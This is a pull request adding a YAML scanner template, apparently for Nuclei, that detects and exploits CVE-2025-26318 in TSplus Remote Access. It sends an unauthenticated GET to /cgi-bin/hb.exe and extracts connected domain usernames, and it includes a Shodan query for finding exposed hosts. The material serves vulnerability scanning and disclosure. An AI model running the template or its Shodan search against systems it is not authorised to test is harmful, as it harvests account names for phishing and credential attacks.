### PR TITLE
Add CVE-2025-26318 - TSplus Remote Access Domain Account Disclosure

### DIFF
--- a/http/cves/2025/CVE-2025-26318.yaml
+++ b/http/cves/2025/CVE-2025-26318.yaml
@@ -1,0 +1,59 @@
+id: CVE-2025-26318
+
+info:
+  name: TSplus Remote Access < 17.30 - Domain Account Disclosure
+  author: Bushi-gg
+  severity: medium
+  description: |
+    TSplus Remote Access versions prior to 17.30 expose the /cgi-bin/hb.exe endpoint which
+    discloses information about domain accounts currently connected to the application. An
+    unauthenticated remote attacker can retrieve a list of all domain users logged into
+    the TSplus instance via a simple HTTP GET request, providing reconnaissance data for
+    targeted phishing, vishing, or credential stuffing attacks.
+  impact: |
+    An unauthenticated attacker can enumerate all currently connected domain accounts,
+    enabling targeted phishing, credential stuffing, or further lateral movement attacks.
+  reference:
+    - https://github.com/Frozenka/CVE-2025-26318
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-26318
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-26318
+    cwe-id: CWE-276
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: tsplus
+    product: remote-access
+    shodan-query: http.html:"TSplus"
+  tags: cve,cve2025,tsplus,information-disclosure,user-enumeration
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/hb.exe"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "\\"
+          - "DOMAIN"
+        condition: or
+
+      - type: regex
+        part: body
+        regex:
+          - '[A-Z0-9_-]+\\[A-Za-z0-9._-]+'
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - '[A-Z0-9_-]+\\[A-Za-z0-9._-]+'


### PR DESCRIPTION
## Description
This template detects and exploits CVE-2025-26318, an information disclosure vulnerability in TSplus Remote Access that exposes connected domain account names.

## Vulnerability Details
- **CVE:** CVE-2025-26318
- **CVSS:** 5.3 (Medium)
- **Type:** Insecure Permissions / Information Disclosure
- **Affected:** TSplus Remote Access < v17.30
- **CWE:** CWE-276

## How It Works
The `/cgi-bin/hb.exe` endpoint in TSplus Remote Access exposes a list of all domain accounts currently connected to the application without any authentication. An attacker can enumerate valid domain usernames by making a simple GET request.

The template:
1. Sends a GET request to `/cgi-bin/hb.exe`
2. Matches response for DOMAIN\username patterns (e.g., `CORP\jsmith`)
3. Extracts all matched domain accounts

## Impact
Attackers can use disclosed domain accounts for:
- Targeted phishing/vishing campaigns
- Credential stuffing attacks
- Active Directory enumeration
- Lateral movement planning

## References
- https://github.com/Frozenka/CVE-2025-26318
- https://nvd.nist.gov/vuln/detail/CVE-2025-26318

## Testing
Template extracts actual domain usernames from the response, confirming the information disclosure is exploitable.